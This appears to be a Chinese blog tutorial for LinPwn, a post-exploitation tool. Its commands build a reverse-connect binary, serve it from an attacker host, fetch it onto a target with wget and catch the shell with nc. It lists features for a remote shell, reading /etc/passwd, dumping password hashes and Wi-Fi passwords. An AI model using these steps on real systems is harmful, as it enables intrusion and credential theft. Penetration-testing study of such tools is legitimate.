LinPwn —— 交互式的后渗透阶段枚举和提权辅助工具

LinPwn是一款交互式的后渗透阶段枚举和提权辅助工具。
Github:https://github.com/3XPL017/LinPwn

编译

克隆源码

git clone https://github.com/3XPL017/LinPwn.git

编辑LinPwn.cc文件,修改反弹连接IP及端口,然后必用build.sh编译

cd LinPwn
vi LinPwn.cc   #编辑反弹IP及端口

bash build.sh --default    #编译

上传LinPwn文件到靶机

编译成功后,文件夹下生成一个LinPwn,该文件上传到靶机上执行。
攻击端使用Python3开启一个HTTP服务

#攻击端IP为192.168.137.200,HTTP服务开启在8000端口

python3 -m http.server 8000

靶机上使用Wget下载文件

wget http://192.168.137.200:8000/LinPwn

连接

攻击端使用nc监听

#监听在1024端口,与LinPwn.cc中修改的端口保持一致
nc -lvp 1024

靶机上运行LinPwn

chmod _x LinPwn
./LinPwn

连接成功后,攻击端收到返回的系统信息

使用

  • shell - 执行靶机上的/bin/sh
    示例: (LinPwn: Shell) > id
    输入 exit 返回到 LinPwn.

  • readfile - 读取文件内容
    示例: (LinPwn: ReadFile)> /etc/passwd
    输入 exit 返回到 LinPwn.

  • enumerate - 运行 LinEnum.sh
    示例: (LinPwn) > enumerate

LinEnum运行结果显示在靶机上,辅助提权,偶尔不成功,可尝试多运行几次。
默认从Github上下载LinEnum.sh文件,国内网络或者内网使用可能下载不成功,可以修改LinPwn.cc代码中下载链接为攻击段地址,攻击端开启HTTP服务提供文件下载。

  • download - 下载文件到靶机
    示例: (LinPwn: Download) > https://exampleurl.com/file_to_download

  • wificredz - 获悉靶机上保持的Wifi密码

  • hashdump - 获取系统密码Hash
    在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值